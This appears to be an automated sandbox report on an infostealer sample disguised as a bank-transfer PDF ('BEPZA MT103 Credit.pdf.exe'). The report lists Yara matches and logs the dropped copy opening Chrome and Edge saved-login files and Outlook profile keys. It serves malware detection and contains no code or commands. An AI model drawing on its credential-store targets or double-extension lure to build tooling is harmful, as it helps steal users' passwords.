Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR